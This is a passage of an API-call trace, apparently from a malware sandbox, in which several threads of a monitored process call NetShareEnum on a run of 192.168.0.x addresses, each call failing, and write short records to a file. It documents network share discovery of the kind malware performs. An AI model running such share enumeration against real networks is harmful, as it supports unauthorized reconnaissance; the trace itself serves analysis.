lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.176] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6d1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6d1fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.258] NetShareEnum (in: servername="\\\\192.168.0.212", level=0x1, bufptr=0x6d1fedc, prefmaxlen=0xffffffff, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc | out: bufptr=0x6d1fedc, entriesread=0x6d1fed4, totalentries=0x6d1fed0, resume_handle=0x6d1fecc) returned 0x35 [0257.953] SetEvent (hEvent=0x1dc) returned 1 [0257.953] RtlExitUserThread (Status=0x0) Thread: id = 81 os_tid = 0xcf8 [0089.887] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.60", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.60", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.60", lpUsedDefaultChar=0x0) returned 14 [0089.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.888] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.888] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x6e5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6e5fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.895] NetShareEnum (in: servername="\\\\192.168.0.60", level=0x1, bufptr=0x6e5fedc, prefmaxlen=0xffffffff, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc | out: bufptr=0x6e5fedc, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc) returned 0x35 [0144.907] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.129", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.907] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.129", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.129", lpUsedDefaultChar=0x0) returned 15 [0144.907] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.907] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.907] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.908] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.908] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.908] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.908] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x6e5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6e5fc54*=0x22, lpOverlapped=0x0) returned 1 [0144.911] NetShareEnum (in: servername="\\\\192.168.0.129", level=0x1, bufptr=0x6e5fedc, prefmaxlen=0xffffffff, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc | out: bufptr=0x6e5fedc, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc) returned 0x35 [0178.125] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.140", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.125] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.140", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.140", lpUsedDefaultChar=0x0) returned 15 [0178.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.125] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.125] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6e5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.126] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.126] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.126] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6e5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6e5fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.129] NetShareEnum (in: servername="\\\\192.168.0.140", level=0x1, bufptr=0x6e5fedc, prefmaxlen=0xffffffff, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc | out: bufptr=0x6e5fedc, entriesread=0x6e5fed4, totalentries=0x6e5fed0, resume_handle=0x6e5fecc) returned 0x35 [0211.215] SetEvent (hEvent=0x1dc) returned 1 [0211.215] RtlExitUserThread (Status=0x0) Thread: id = 82 os_tid = 0xcfc [0089.896] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.61", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.896] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.61", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.61", lpUsedDefaultChar=0x0) returned 14 [0089.896] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.896] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.896] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.896] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.896] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.897] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x6f9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6f9fc54*=0x10, lpOverlapped=0x0) returned 1 [0089.903] NetShareEnum (in: servername="\\\\192.168.0.61", level=0x1, bufptr=0x6f9fedc, prefmaxlen=0xffffffff, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc | out: bufptr=0x6f9fedc, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc) returned 0x35 [0144.570] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.124", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.570] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.124", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.124", lpUsedDefaultChar=0x0) returned 15 [0144.570] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.570] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.570] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.571] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.571] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.571] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.571] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6f9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6f9fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.577] NetShareEnum (in: servername="\\\\192.168.0.124", level=0x1, bufptr=0x6f9fedc, prefmaxlen=0xffffffff, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc | out: bufptr=0x6f9fedc, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc) returned 0x35 [0178.205] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.151", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.151", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.151", lpUsedDefaultChar=0x0) returned 15 [0178.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.206] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6f9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6f9fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.210] NetShareEnum (in: servername="\\\\192.168.0.151", level=0x1, bufptr=0x6f9fedc, prefmaxlen=0xffffffff, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc | out: bufptr=0x6f9fedc, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc) returned 0x35 [0211.214] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.253", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.214] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.253", cchWideChar=15, lpMultiByteStr=0x1e8334c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.253", lpUsedDefaultChar=0x0) returned 15 [0211.214] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x6f9fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6f9fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x6f9ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.425] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x6f9fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x6f9fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.429] NetShareEnum (in: servername="\\\\192.168.0.253", level=0x1, bufptr=0x6f9fedc, prefmaxlen=0xffffffff, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc | out: bufptr=0x6f9fedc, entriesread=0x6f9fed4, totalentries=0x6f9fed0, resume_handle=0x6f9fecc) returned 0x35 [0258.086] SetEvent (hEvent=0x1dc) returned 1 [0258.086] RtlExitUserThread (Status=0x0) Thread: id = 83 os_tid = 0xd08 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.62", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.62", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.62", lpUsedDefaultChar=0x0) returned 14 [0089.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.904] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.904] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x70dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x70dfc54*=0x10, lpOverlapped=0x0) returned 1 [0089.912] NetShareEnum (in: servername="\\\\192.168.0.62", level=0x1, bufptr=0x70dfedc, prefmaxlen=0xffffffff, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc | out: bufptr=0x70dfedc, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc) returned 0x35 [0144.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.123", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.123", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.123", lpUsedDefaultChar=0x0) returned 15 [0144.561] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.561] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.562] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.562] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.562] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x70dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x70dfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.565] NetShareEnum (in: servername="\\\\192.168.0.123", level=0x1, bufptr=0x70dfedc, prefmaxlen=0xffffffff, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc | out: bufptr=0x70dfedc, entriesread=0x70dfed4, totalentries=0x70dfed0, resume_handle=0x70dfecc) returned 0x35 [0178.171] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.146", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.146", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.146", lpUsedDefaultChar=0x0) returned 15 [0178.172] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x70dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.172] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, 